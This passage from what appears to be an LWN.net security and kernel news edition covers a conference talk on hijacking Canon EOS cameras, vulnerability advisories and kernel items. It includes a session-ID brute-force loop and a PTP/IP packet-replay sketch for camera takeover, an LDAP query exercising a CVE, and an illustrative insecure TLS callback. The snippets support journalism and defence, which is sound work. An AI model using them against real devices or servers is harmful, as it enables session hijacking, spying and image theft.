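            cookie = {"sessionID": format(guess, "04x")}
            r = requests.get(CAMERA + PATH, cookies=cookie, timeout=5)
            if r.status_code != 401:     # not rejected: we hit a live session
                return cookie["sessionID"]
        return None

    print("hijacked session:", find_session_id())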

Once authenticated, the attacker has control over most, but not all, of the camera's automatic functions: picture-taking, focus, changing settings, and so on. The attacker can even activate "live view" mode, which relays a through-the-lens view to the remote browser. In addition, the attacker can browse, download, and delete existing images.

EOS Utility mode offers many of the same features (including shooting and live view mode), but it is designed to connect to Canon's Mac OS X or Windows client applications. The connection method and communication protocol are different, however. When put into EOS Utility mode, the camera advertises itself to the network using the Simple Service Discovery Protocol (SSDP) (which is a multicast message visible to all). The very first time it is used, the camera must manually be put into pairing mode, but subsequently the desktop client and the camera perform a simple handshake, which Mende and Turbing were able to reverse engineer.

The protocol used for communicating between the client application and camera is called PTP/IP, the IP-delivered variant of the standardized Picture Transfer Protocol (PTP) commonly implemented over USB (gPhoto and many other open source applications speak PTP already). At first, Mende and Turbing said, they were concerned that the EOS Utility handshake would be difficult to crack; the authentication command contains a 16-byte ID and a hostname string. But although one would assume that the hostname would be matched against the computer paired with the camera during the first-run setup, they discovered that in fact it is not used at all. Furthermore, the 16-byte ID value is broadcast (in obfuscated form) by the camera in its UPnP messages. Ultimately, an attacker does need an authenticated user to have an active session, but the attacker can disconnect it with the TCP reset attack mentioned earlier and immediately replay the credentials, taking over the session. Of course, the attacker will probably also need a copy of Canon's client application in order to do anything useful (it is unknown if other PTP implementations like gPhoto can control the cameras directly), but Canon provides free downloads of that as a convenience.
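
For the curious, the connection-opening packet in question is small and simple. The sketch below builds a PTP/IP "init command request" (length, packet type, 16-byte GUID, UTF-16 friendly name, protocol version) following the publicly documented PTP/IP layout; the address, port, and GUID are placeholders, and the de-obfuscation of the GUID broadcast in the camera's UPnP messages is left out entirely.

    # Sketch: open a PTP/IP command connection by replaying a harvested GUID.
    import socket, struct, uuid

    CAMERA = ("192.168.1.50", 15740)   # 15740 is the standard PTP/IP port
    guid = uuid.UUID("00112233-4455-6677-8899-aabbccddeeff").bytes  # placeholder
    name = "any-hostname".encode("utf-16-le") + b"\x00\x00"  # reportedly ignored
    version = struct.pack("<I", 0x00010000)                  # PTP/IP version 1.0

    payload = guid + name + version
    packet = struct.pack("<II", 8 + len(payload), 1) + payload  # type 1 = init req

    s = socket.create_connection(CAMERA)
    s.sendall(packet)
    print(s.recv(4096))   # an init ack here means the camera accepted the ID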

Cinéma vérité

Mende and Turbing performed a live demonstration in their session, which revealed some additional details. For example, the camera must be pinged regularly or else it will drop the EOS Utility connection (a limitation that stealing images via the other three methods does not suffer from). The PTP/IP connection also has an upper limit on its throughput of about 2 megabits per second, which means stealing images from across the coffee shop can be time consuming. Mende and Turbing used the smaller JPEG format for the images in their demonstration; raw files on the 1D X are in the 20MB range. The pair also said that they were able to disable manual control of the camera when connected in EOS Utility mode. The owner of the camera could always power-cycle the camera, of course, but this is yet another possible denial-of-service approach.

The speakers commented that activating live view mode of a camera remotely had privacy implications, since an attacker could spy on someone else through a device thought to be sitting idle. They speculated that the surveillance risk might be even higher if they find a way to activate the camera's microphone, which so far they have not been able to do. Audience members asked some interesting questions, such as whether firmware updates might patch any of the flaws discussed. Mende and Turbing replied that there had been two firmware updates since the camera's release, and that all of the attacks were carried out with the most recent release. A Bluetooth dongle is available from Canon as well, and another audience member asked about its potential for attackers. The speakers replied that it appears to be capable of connecting only to a GPS unit. But perhaps it is only a matter of time until Bluetooth becomes a problem, too; the pair ended the talk by noting that Canon's latest offering, the EOS 6D, adds a WiFi access point mode and a new protocol designed for interfacing with iOS and Android apps.

It might be hard to accurately gauge the risk of security flaws in a top-of-the-line digital camera, but as Mende and Turbing noted, the features found on the super expensive camera of today are working their way to the consumer-grade product of tomorrow. At the moment, the photographer processing images in the hotel after a big event needs to worry the most. Photographs can be stolen, altered, or even replaced if one is careless enough to trust the network.

One might reasonably argue that anybody who willingly enables FTP Upload or DLNA mode on his or her camera has no expectation of privacy; after all, photojournalists (especially those in dangerous locations) already know how important protecting their data is. For a few people such a risk might endanger their safety; for most others only their livelihood is at stake. Consider the paparazzi mentioned in the talk title, among whom being the first to bring back pictures of an event or an infant with the right parents can be worth tens of thousands. The second paparazzo to bring back the coveted pictures might have a hard time proving that the first actually stole them over the network and altered the Exif data.

For open source developers, the findings in this talk offer some words of caution. Users of aftermarket firmware like CHDK or Magic Lantern need to protect their users even if Canon and Nikon do not. On the other hand, weak authentication probably makes it easier to reverse engineer the undocumented protocols often found in these cameras, so users of tethered shooting applications may actually see some benefits somewhere down the line. For the rest of the camera-buying public, though, the take-away is that cameras are just as exploitable as every other consumer electronics gadget on the network. So in 2012, celebrities and politicians may have gotten their phones hacked, but in 2013 their cameras may well be the target. The risks are exactly the same, but at least the pictures will be sharper and perhaps sport better noise-reduction.

Comments (none posted)

Brief items

Security quotes of the week

The password can't contain obscene language.
-- AT&T goes a bit overboard (as reported by ars technica)

So what is the solution to the copyright wars? It's the same solution we need to the press-regulation wars, to the war on terror, to the surveillance wars, to the pornography wars: to acknowledge that the internet is the nervous system of the information age, and that preserving its integrity and freedom from surveillance, censorship and control is the essential first step to securing every other desirable policy goal.
-- Cory Doctorow

GPS always reports you at the GooglePlex
Contacts list shows Justin Beiber as your only friend
Outbound packets over cell network should require visual inspection and confirmation
[...]
Continuous face detection - if non-owner detected, explode phone
-- Steve Kondik (aka Cyanogen) has some ideas for a secret agent Android fork

Comments (4 posted)

PostgreSQL security update coming April 4

The PostgreSQL project has announced an update coming on April 4. "This release will include a fix for a high-exposure security vulnerability. All users are strongly urged to apply the update as soon as it is available." Pre-announcement of security updates is quite rare, as is the associated shutdown of repository updates and distribution of commit messages, so one assumes that it would be a good idea to be ready to apply this update when it arrives.

Full Story (comments: 3)

New vulnerabilities

389-ds-base: information exposure

Package(s): 389-ds-base  CVE #(s): CVE-2013-1897
Created: April 3, 2013  Updated: June 13, 2013
Description: From the Red Hat bugzilla:

It was found that the 389 Directory Server did not properly restrict access to entries when the 'nsslapd-allow-anonymous-access' configuration setting is set to 'rootdse'. An anonymous user could connect to the LDAP database and, if the search scope is set to BASE, obtain access to information outside of the rootDSE. The 'rootdse' option exists to provide anonymous access to the rootDSE but no other entries in the directory. An administrator could believe that directory entries are being restricted with this option enabled, however the information provided would be the same as if 'nsslapd-allow-anonymous-access' were set to 'on'.

ACI's are still properly evaluated despite this flaw, so this can easily be mitigated by removing the anonymous read ACL.
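
As a hedged illustration of the query pattern described above (using the python-ldap module; the server URL and entry DN are hypothetical), an anonymous BASE-scope search looks like this — on a fixed server, or one with the anonymous read ACL removed, the second search should return nothing to an anonymous client:

    import ldap   # python-ldap

    conn = ldap.initialize("ldap://ds.example.com")
    conn.simple_bind_s("", "")     # anonymous bind

    # The root DSE (empty base DN) is all that 'rootdse' mode is meant to expose:
    print(conn.search_s("", ldap.SCOPE_BASE, "(objectClass=*)"))

    # With CVE-2013-1897, a BASE-scope search against an ordinary entry could
    # also return data to the anonymous client:
    print(conn.search_s("uid=jdoe,ou=People,dc=example,dc=com",
                        ldap.SCOPE_BASE, "(objectClass=*)"))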

Alerts:
Fedora FEDORA-2013-5349 389-ds-base 2013-06-13
Oracle ELSA-2013-0742 389-ds-base 2013-04-15
Scientific Linux SL-389--20130415 389-ds-base 2013-04-15
CentOS CESA-2013:0742 389-ds-base 2013-04-16
Red Hat RHSA-2013:0742-01 389-ds-base 2013-04-15
Fedora FEDORA-2013-4460 freeipa 2013-04-11
Fedora FEDORA-2013-4578 389-ds-base 2013-04-03

Comments (none posted)

bind: denial of service

Package(s): bind  CVE #(s): CVE-2013-2266
Created: March 29, 2013  Updated: April 8, 2013
Description: From the Red Hat advisory:

A denial of service flaw was found in the libdns library. A remote attacker could use this flaw to send a specially-crafted DNS query to named that, when processed, would cause named to use an excessive amount of memory, or possibly crash. (CVE-2013-2266)

Alerts:
Oracle ELSA-2014-1244 bind97 2014-09-17
Gentoo 201401-34 bind 2014-01-29
Oracle ELSA-2014-0043 bind 2014-01-20
openSUSE openSUSE-SU-2013:0666-1 bind 2013-04-11
Mandriva MDVSA-2013:059 dhcp 2013-04-08
Mageia MGASA-2013-0105 bind 2013-04-04
openSUSE openSUSE-SU-2013:0620-1 dhcp 2013-04-04
openSUSE openSUSE-SU-2013:0619-1 dhcp 2013-04-04
openSUSE openSUSE-SU-2013:0605-1 bind 2013-04-03
Debian DSA-2656-1 bind9 2013-03-30
Ubuntu USN-1783-1 bind9 2013-03-29
Scientific Linux SL-bind-20130329 bind97 2013-03-29
Scientific Linux SL-bind-20130329 bind 2013-03-29
Oracle ELSA-2013-0690 bind97 2013-03-29
Oracle ELSA-2013-0689 bind 2013-03-28
CentOS CESA-2013:0690 bind97 2013-03-28
CentOS CESA-2013:0689 bind 2013-03-29
Red Hat RHSA-2013:0690-01 bind97 2013-03-28
Red Hat RHSA-2013:0689-01 bind 2013-03-28
Mandriva MDVSA-2013:058 bind 2013-04-08
Fedora FEDORA-2013-4533 bind 2013-04-07
Fedora FEDORA-2013-4525 bind 2013-04-05
openSUSE openSUSE-SU-2013:0625-1 dhcp 2013-04-04

Comments (none posted)

drupal7-views: cross-site scripting

Package(s): drupal7-views  CVE #(s): CVE-2013-1887
Created: April 1, 2013  Updated: April 3, 2013
Description: From the Drupal advisory:

The Views module provides a flexible method for Drupal site designers to control how lists and tables of content, users, taxonomy terms and other data are presented.

The module incorrectly prints some view configuration fields without proper sanitization opening a Cross-Site Scripting vulnerability.

The vulnerability is mitigated by the fact that an attacker must have a role with the permission "Administer vocabularies and terms" or other administer-related permissions from contributed modules that integrate with Views.

Alerts:
Fedora FEDORA-2013-4134 drupal7-views 2013-03-30
Fedora FEDORA-2013-4215 drupal7-views 2013-03-30

Comments (none posted)

gajim: man-in-the-middle attack

Package(s): gajim  CVE #(s): CVE-2012-5524
Created: April 1, 2013  Updated: January 7, 2014
Description: From the Red Hat bugzilla:

A security flaw was found in the way Gajim, a Jabber client written in PyGTK, performed verification of invalid (broken / expired) x.509v3 SSL certificates (True as return value was returned always regardless if error during certificate validation occurred or not). A rogue XMPP server could use this flaw to conduct man-in-the-middle attack (MiTM) and trick Gajim client to accept the certificate even when it was invalid / should not be accepted.
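
The flaw described is a common anti-pattern in TLS code. The sketch below is not Gajim's actual code, just an illustration of the pattern (with pyOpenSSL-style callback arguments, which is an assumption): a verification callback that ignores the result it is handed and reports success unconditionally, alongside the one-line shape of the fix.

    def broken_verify_cb(connection, x509, errnum, errdepth, ok):
        # The bug class: whatever OpenSSL concluded (expired, self-signed,
        # unknown CA...), tell the caller the certificate checked out.
        return True

    def fixed_verify_cb(connection, x509, errnum, errdepth, ok):
        # The fix: propagate OpenSSL's verdict instead of overriding it.
        return bool(ok)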

Alerts:
Gentoo 201401-02 gajim 2014-01-06
Fedora FEDORA-2013-4210 gajim 2013-03-30
Fedora FEDORA-2013-4205 gajim 2013-03-30
Mageia MGASA-2013-0111 gajim 2013-04-06

Comments (none posted)

glibc: denial of service

Package(s): glibc  CVE #(s): CVE-2013-0242
Created: April 1, 2013  Updated: June 3, 2013
Description: From the CVE entry:

Buffer overflow in the extend_buffers function in the regular expression matcher (posix/regexec.c) in glibc, possibly 2.17 and earlier, allows context-dependent attackers to cause a denial of service (memory corruption and crash) via crafted multibyte characters.

Alerts:
Debian-LTS DLA-165-1 eglibc 2015-03-06
Gentoo 201503-04 glibc 2015-03-08
SUSE SUSE-SU-2014:1128-1 glibc 2014-09-15
SUSE SUSE-SU-2014:1122-1 glibc 2014-09-12
Scientific Linux SLSA-2013:1605-2 glibc 2013-12-03
Oracle ELSA-2013-1605 glibc 2013-11-26
Red Hat RHSA-2013:1605-02 glibc 2013-11-21
Ubuntu USN-1991-1 eglibc 2013-10-21
openSUSE openSUSE-SU-2013:1510-1 glibc 2013-09-30
Fedora FEDORA-2013-4174 glibc 2013-06-02
Mageia MGASA-2013-0141 glibc 2013-05-09
Mandriva MDVSA-2013:163 glibc 2013-05-07
Mandriva MDVSA-2013:162 glibc 2013-05-07
Scientific Linux SL-glib-20130425 glibc 2013-04-25
Oracle ELSA-2013-0769 glibc 2013-04-25
CentOS CESA-2013:0769 glibc 2013-04-24
Red Hat RHSA-2013:0769-01 glibc 2013-04-24
Fedora FEDORA-2013-4100 glibc 2013-03-30

Comments (none posted)

jenkins: man-in-the-middle attacks

Package(s): jenkins  CVE #(s): CVE-2013-0253
Created: April 3, 2013  Updated: April 3, 2013
Description: From the Red Hat advisory:

It was found that all SSL certificate checking was disabled by default in the Apache Maven Wagon plug-in of Jenkins. This would make it easy for an attacker to perform man-in-the-middle attacks.

Alerts:
Red Hat RHSA-2013:0700-01 jenkins 2013-04-02

Comments (none posted)

libxslt: denial of service

Package(s): libxslt  CVE #(s): CVE-2012-6139
Created: April 2, 2013  Updated: April 18, 2013
Description: From the Ubuntu advisory:

Nicholas Gregoire discovered that libxslt incorrectly handled certain empty values. If a user or automated system were tricked into processing a specially crafted XSLT document, a remote attacker could cause libxslt to crash, causing a denial of service.

Alerts:
Gentoo 201401-07 libxslt 2014-01-10
Fedora FEDORA-2013-4507 libxslt 2013-04-18
Mandriva MDVSA-2013:141 libxslt 2013-04-11
openSUSE openSUSE-SU-2013:0593-1 libxslt 2013-04-02
openSUSE openSUSE-SU-2013:0585-1 libxslt 2013-04-02
Ubuntu USN-1784-1 libxslt 2013-04-02
Mageia MGASA-2013-0107 libxslt 2013-04-04
Debian DSA-2654-1 libxslt 2013-04-03

Comments (none posted)

mantis: multiple vulnerabilities

Package(s): mantis  CVE #(s): CVE-2013-0197 CVE-2013-1883
Created: April 1, 2013  Updated: April 3, 2013
Description: From the Red Hat bugzilla [1, 2]:

A denial of service flaw was found in the way MantisBT, a free popular web-based issue tracking system, performed processing of certain type of View Issues page search queries. A remote attacker could provide a specially-crafted query (filter combining some criteria and a text search with 'any condition') that, when processed by the MantisBT system, would lead to excessive system resources consumption (denial of service), possibly leading to complete MantisBT server instance unavailability. (CVE-2013-1883)

A persistent cross-site scripting (XSS) flaw was found in the way Mantis, a web-based issue tracking system, performed sanitization of the 'match_type' parameter. A remote attacker could provide a specially-crafted URL that, when processed by Mantis instance, would lead to arbitrary web script or HTML execution. (CVE-2013-0197)

Alerts:
Fedora FEDORA-2013-4335 mantis 2013-04-01
Fedora FEDORA-2013-4319 mantis 2013-04-01

Comments (none posted)

moodle: multiple vulnerabilities

Package(s):moodle CVE #(s):CVE-2013-1830 CVE-2013-1831 CVE-2013-1832 CVE-2013-1833 CVE-2013-1834 CVE-2013-1835 CVE-2013-1836
Created:April 3, 2013 Updated:April 3, 2013
Description: From the CVE entries:

user/view.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 does not enforce the forceloginforprofiles setting, which allows remote attackers to obtain sensitive course-profile information by leveraging the guest role, as demonstrated by a Google search. (CVE-2013-1830)

lib/setuplib.php in Moodle through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allows remote attackers to obtain sensitive information via an invalid request, which reveals the absolute path in an exception message. (CVE-2013-1831)

repository/webdav/lib.php in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 includes the WebDAV password in the configuration form, which allows remote authenticated administrators to obtain sensitive information by configuring an instance. (CVE-2013-1832)

Multiple cross-site scripting (XSS) vulnerabilities in the File Picker module in Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allow remote authenticated users to inject arbitrary web script or HTML via a crafted filename. (CVE-2013-1833)

notes/edit.php in Moodle 1.9.x through 1.9.19, 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allows remote authenticated users to reassign notes via a modified (1) userid or (2) courseid field. (CVE-2013-1834)

Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 allows remote authenticated administrators to obtain sensitive information from the external repositories of arbitrary users by leveraging the login_as feature. (CVE-2013-1835)

Moodle 2.x through 2.1.10, 2.2.x before 2.2.8, 2.3.x before 2.3.5, and 2.4.x before 2.4.2 does not properly manage privileges for WebDAV repositories, which allows remote authenticated users to read, modify, or delete arbitrary site-wide repositories by leveraging certain read access. (CVE-2013-1836)

Alerts:
Fedora FEDORA-2013-4404 moodle 2013-04-03
Fedora FEDORA-2013-4387 moodle 2013-04-03

Comments (none posted)

mozilla: multiple vulnerabilities

Package(s):firefox thunderbird seamonkey CVE #(s):CVE-2013-0788 CVE-2013-0793 CVE-2013-0795 CVE-2013-0796 CVE-2013-0800
Created:April 3, 2013 Updated:June 3, 2013
Description: From the Red Hat advisory:

Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0788)

A flaw was found in the way Same Origin Wrappers were implemented in Firefox. A malicious site could use this flaw to bypass the same-origin policy and execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0795)

A flaw was found in the embedded WebGL library in Firefox. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. Note: This issue only affected systems using the Intel Mesa graphics drivers. (CVE-2013-0796)

An out-of-bounds write flaw was found in the embedded Cairo library in Firefox. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2013-0800)

A flaw was found in the way Firefox handled the JavaScript history functions. A malicious site could cause a web page to be displayed that has a baseURI pointing to a different site, allowing cross-site scripting (XSS) and phishing attacks. (CVE-2013-0793)

Alerts:
openSUSE openSUSE-SU-2014:1100-1 Firefox 2014-09-09
Gentoo 201309-23 firefox 2013-09-27
openSUSE openSUSE-SU-2013:1180-1 seamonkey 2013-07-11
SUSE SUSE-SU-2013:1152-1 Mozilla Firefox 2013-07-05
Debian DSA-2699-1 iceweasel 2013-06-02
SUSE SUSE-SU-2013:0850-1 Mozilla Firefox 2013-05-31
SUSE SUSE-SU-2013:0843-1 Mozilla Firefox 2013-05-28
SUSE SUSE-SU-2013:0842-1 Mozilla Firefox 2013-05-28
openSUSE openSUSE-SU-2013:0875-1 seamonkey 2013-06-10
Mageia MGASA-2013-0120 iceape 2013-04-18
Fedora FEDORA-2013-4983 seamonkey 2013-04-16
Fedora FEDORA-2013-4957 seamonkey 2013-04-15
Mandriva MDVSA-2013:087 firefox 2013-04-09
Slackware SSA:2013-097-01 seamonkey 2013-04-07
openSUSE openSUSE-SU-2013:0631-1 Mozilla 2013-04-05
Fedora FEDORA-2013-4832 xulrunner 2013-04-05
Fedora FEDORA-2013-4832 thunderbird 2013-04-05
Oracle ELSA-2013-0696 firefox 2013-04-03
CentOS CESA-2013:0697 thunderbird 2013-04-03
CentOS CESA-2013:0697 thunderbird 2013-04-03
CentOS CESA-2013:0696 firefox 2013-04-03
CentOS CESA-2013:0696 firefox 2013-04-03
CentOS CESA-2013:0696 xulrunner 2013-04-03
CentOS CESA-2013:0696 xulrunner 2013-04-03
Slackware SSA:2013-093-02 thunderbird 2013-04-03
Slackware SSA:2013-093-01 firefox 2013-04-03
Scientific Linux SL-thun-20130402 thunderbird 2013-04-02
Scientific Linux SL-fire-20130402 firefox 2013-04-02
Oracle ELSA-2013-0697 thunderbird 2013-04-02
Red Hat RHSA-2013:0697-01 thunderbird 2013-04-02
Red Hat RHSA-2013:0696-01 firefox 2013-04-02
Mageia MGASA-2013-0109 thunderbird 2013-04-04
SUSE SUSE-SU-2013:0645-1 Mozilla Firefox 2013-04-08
Ubuntu USN-1791-1 thunderbird 2013-04-08
Ubuntu USN-1786-2 USN-1786-1 fixed 2013-04-04
Ubuntu USN-1786-1 firefox 2013-04-04
Fedora FEDORA-2013-4832 firefox 2013-04-05
Mageia MGASA-2013-0108 firefox 2013-04-04
openSUSE openSUSE-SU-2013:0630-1 Mozilla 2013-04-05
Oracle ELSA-2013-0696 firefox 2013-04-03

Comments (none posted)

rails: multiple vulnerabilities

Package(s):rails CVE #(s):CVE-2013-1854 CVE-2013-1855 CVE-2013-1857
Created:March 29, 2013 Updated:April 11, 2013
Description:

From the CVE database:

The Active Record component in Ruby on Rails 2.3.x before 2.3.18, 3.1.x before 3.1.12, and 3.2.x before 3.2.13 processes certain queries by converting hash keys to symbols, which allows remote attackers to cause a denial of service via crafted input to a where method. (CVE-2013-1854)

The sanitize_css method in lib/action_controller/vendor/html-scanner/html/sanitizer.rb in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before 3.1.12, and 3.2.x before 3.2.13 does not properly handle \n (newline) characters, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via crafted Cascading Style Sheets (CSS) token sequences. (CVE-2013-1855)

The sanitize helper in lib/action_controller/vendor/html-scanner/html/sanitizer.rb in the Action Pack component in Ruby on Rails before 2.3.18, 3.0.x and 3.1.x before 3.1.12, and 3.2.x before 3.2.13 does not properly handle encoded : (colon) characters in URLs, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted scheme name, as demonstrated by including a : sequence. (CVE-2013-1857)

Alerts:
Gentoo 201412-28 rails 2014-12-14
openSUSE openSUSE-SU-2014:0019-1 rubygem-actionpack-2_3 2014-01-03
openSUSE openSUSE-SU-2013:0661-1 rubygem-actionpack-3_2 2013-04-10
openSUSE openSUSE-SU-2013:0667-1 rubygem-activerecord-2_3 2013-04-11
openSUSE openSUSE-SU-2013:0659-1 rubygem-activerecord-3_2 2013-04-10
openSUSE openSUSE-SU-2013:0664-1 rubygem-activesupport-2_3 2013-04-10
openSUSE openSUSE-SU-2013:0668-1 rubygem-activesupport-2_3 2013-04-11
openSUSE openSUSE-SU-2013:0662-1 rubygem-actionpack-2_3 2013-04-10
openSUSE openSUSE-SU-2013:0660-1 rubygem-activerecord-2_3 2013-04-10
Red Hat RHSA-2013:0699-01 ruby193-rubygem-activerecord 2013-04-02
Red Hat RHSA-2013:0698-01 rubygem-actionpack 2013-04-02
Fedora FEDORA-2013-4139 rubygem-activerecord 2013-03-30
Fedora FEDORA-2013-4199 rubygem-actionpack 2013-03-30
Fedora FEDORA-2013-4214 rubygem-actionpack 2013-03-30
Debian DSA-2655-1 rails 2013-03-28

Comments (none posted)

rubygem-activesupport: XML parsing vulnerability

Package(s):rubygem-activesupport CVE #(s):CVE-2013-1856
Created:April 1, 2013 Updated:April 3, 2013
Description: From the Red Hat bugzilla:

XML Parsing Vulnerability affecting JRuby users

There is a vulnerability in the JDOM backend to ActiveSupport's XML parser. This could allow an attacker to perform a denial of service attack or gain access to files stored on the application server. This vulnerability has been assigned the CVE identifier CVE-2013-1856.

Versions Affected: 3.0.0 and All Later Versions when using JRuby
Not affected: Applications not using JRuby or JRuby applications not using the JDOM backend.
Fixed Versions: 3.2.13, 3.1.12

Alerts:
Gentoo 201412-28 rails 2014-12-14
Fedora FEDORA-2013-4130 rubygem-activesupport 2013-03-30
Fedora FEDORA-2013-4198 rubygem-activesupport 2013-03-30

Comments (none posted)

Page editor: Jake Edge

Kernel development

Brief items

Kernel release status

The current development kernel is 3.9-rc5, released on March 31. Linus says: "Nothing really peculiar stands out. Exynos DRM updates, IBM RamSan driver updates are a bit larger, l2tp update... The rest is pretty much small patches spread out all over. Mostly drivers (block, net, media, tty, usb), networking, and some filesystem updates (btrfs, nfs). Some arch updates (x86, arc). Things seem to be calming down a bit, and everything seems largely on track for a 3.9 release in a few weeks."

Stable updates: 3.8.5, 3.4.38, and 3.0.71 were released on March 28 with the usual set of fixes. 3.5.7.9 was also released on the 28th. Another big set of fixes is coming with 3.8.6, 3.4.39, and 3.0.72, which are due on or after April 4.

Comments (none posted)

Quotes of the week

It would be nice if we can avoid the feature-removal.txt step. I mean, I heard some doleful whispers once when my pointer selected that file. Instead of opening the file I just closed the directory instantly. I never told anybody about that before, this is the first time. I also heard that somebody added an entry to that file to schedule the removal of that file? This is devilry.
Frederic Weisbecker

< system in single state : everyone sees cat = alive >

insert_into_box(cat);

< system in dual state : new calls see cat == dead, but
  current calls see cat == alive >

open_box();

< system is back to single state: everyone sees cat = dead >

funeral(cat);
Steven Rostedt explains RCU

Comments (none posted)

ZFS on Linux 0.6.1

On behalf of the ZFS-on-Linux project, Brian Behlendorf has announced the availability of version 0.6.1 of this Solaris-derived filesystem. "Over two years of use by real users has convinced us ZoL is ready for wide scale deployment on everything from desktops to super computers." The project's home page offers binary modules for a wide variety of distributions. (See the FAQ for the project's take on licensing issues.)

Comments (17 posted)

Kernel development news

Avoiding game-score loss with per-process reclaim

By Michael Kerrisk
April 3, 2013

Minchan Kim's recent patch series to provide user-space-triggered reclaim of a process's pages represents one more point in a spectrum that increasingly sees memory management on Linux as a task that is indirectly influenced or even directly controlled from user space.

Approaches such as Android's low-memory killer represent one end of the page-reclaim spectrum, where memory management is primarily under kernel control. When memory is low, the low-memory killer picks a victim process and kills it outright; applications that live in such an environment have to work with the possibility that they may disappear from one moment to the next. As Minchan pointed out via an amusing example, the effects of the low-memory killer's approach to page reclaim can be extreme:

[Having a process killed to free memory] was really terrible experience because I lost my best score of game I had ever after I switch the phone call while I enjoyed the game

John Stultz's volatile ranges work and Minchan's own work on a similar feature (both described in this article) represent a middle point in the spectrum. The volatile ranges approach, inspired by Android's ashmem, provides a process with a way to inform the kernel that a certain range of its own virtual address space can be preferentially reclaimed if memory pressure is high. Under this approach, the kernel takes no responsibility for the contents of the reclaimed pages: if the kernel needs the memory, the page contents are discarded, and it is assumed that the application has sufficient information available to re-create those pages with the right contents if they are needed. As with the low-memory killer, the decision about if and when to reclaim the pages remains with the kernel.

By contrast, Minchan's patch set places the decision about when to reclaim pages directly under the control of user space. The interface provided by these patches is simple. A /proc/PID/reclaim file is provided for each process. A process with suitable permissions—that is, a process owned by root or one with the same user ID as the target process—can write one of the following values to the file, to cause some or all of the process's pages to be reclaimed:

  1. Reclaim all process pages in file-backed mappings.
  2. Reclaim all process pages in anonymous (MAP_ANONYMOUS) mappings.
  3. Reclaim all pages of the process (i.e., the combination of 1 and 2).
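
A user-space task manager using this interface would not need much code. The following sketch assumes the interface behaves exactly as described in the patches; the reclaim_file_pages() helper is purely illustrative and not part of the patch set:

    #include <fcntl.h>
    #include <stdio.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* Illustrative helper, not part of the patches: write "1" to
     * /proc/PID/reclaim to reclaim the target's file-backed pages
     * (the value corresponds to item 1 in the list above). */
    static int reclaim_file_pages(pid_t pid)
    {
        char path[64];
        int fd;

        snprintf(path, sizeof(path), "/proc/%d/reclaim", (int) pid);
        fd = open(path, O_WRONLY);
        if (fd < 0)
            return -1;
        if (write(fd, "1", 1) != 1) {
            close(fd);
            return -1;
        }
        return close(fd);
    }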

As currently implemented, all of the process's pages that match the specified criterion are reclaimed. Your editor wondered whether there might be benefit in allowing some control over the range of pages that are reclaimed from the target process, by allowing an address range to be written to the /proc/PID/reclaim file.

By contrast with volatile ranges and the low-memory killer, modifications in pages reclaimed via /proc/PID/reclaim are not lost. Modified pages are written to the underlying file in the case of shared (MAP_SHARED) file mappings or to swap in other cases. Thus, if the process touches the reclaimed page later, it will be faulted into memory with the contents at the time it was reclaimed. The patches also include some logic to handle the case where multiple processes are sharing the same pages; in that case, the pages are reclaimed only after all of the processes have marked them for reclaim. Like the low-memory killer, /proc/PID/reclaim can be used to reclaim all of the pages in a process, but without needing to kill the process to do so.

The idea behind Minchan's proposal is that a user-space task manager could take over some part of the job of memory management. In some cases, this may be more effective than allowing the kernel to make memory-management decisions, since the user-space task manager can bring application-specific intelligence to decisions about whether to reclaim a process's pages. For example, some application processes may be in the foreground while others are in the background. It may be desirable to preferentially reclaim pages from one of the background processes, even if it has some frequently accessed pages. Of course, the task manager would somehow need to know when the system is under memory pressure. To that end, a mechanism like Anton Vorontsov's proposed vmpressure_fd() API might be useful.

Minchan's patches apply against Michal Hocko's MMOTM (memory management of the moment) tree. The patches came out on March 25, but have so far seen little review. Nevertheless, they present an idea that will probably be of particular interest to the developers of mobile and embedded devices, so it seems likely that they will get some attention at some point in the future.

Comments (4 posted)

A VFS deadlock post-mortem

By Michael Kerrisk
April 3, 2013

Dave Jones continues to exercise his Trinity fuzz tester and uncover interesting bugs in kernel code. One recent find was a long-standing bug in the implementation of network namespaces.

The discussion of the bug began when Dave posted a note to the linux-kernel mailing list with stack traces that showed a kernel deadlock in the VFS code. Dave's report prompted Al Viro to wonder how a Trinity instance was managing to sit blocked on two locks (a situation that should never be able to happen), as shown in the lockdep output posted by Dave (the output has some key pieces highlighted):

    Showing all locks held in the system:
    4 locks on stack by trinity-child2/7669:
     #0: blocked:  (sb_writers#4){.+.+.+}, 
         instance: ffff8801292d17d8, at: [<ffffffff811df134>] mnt_want_write+0x24/0x50
     #1: held:     (&type->s_vfs_rename_key){+.+.+.}, 
         instance: ffff8801292d1928, at: [<ffffffff811c6f5e>] lock_rename+0x3e/0x120
     #2: held:     (&type->i_mutex_dir_key#2/1){+.+.+.}, 
         instance: ffff880110b3a858, at: [<ffffffff811c701e>] lock_rename+0xfe/0x120
     #3: blocked:  (&type->i_mutex_dir_key#2/2){+.+.+.}, 
         instance: ffff880110b3a858, at: [<ffffffff811c7034>] lock_rename+0x114/0x120

Al also noted that the output suggested that a directory inode in the inode cache was mapped by two different dentries, since lockdep showed two i_mutex_dir_key locks on the same address. A dentry (directory entry) is a data structure representing a filename in the kernel directory entry cache (dcache); a brief overview of dentries and the dcache can be found in this article. As will become clear shortly, it should normally never happen that a directory inode is mapped twice in the dcache.

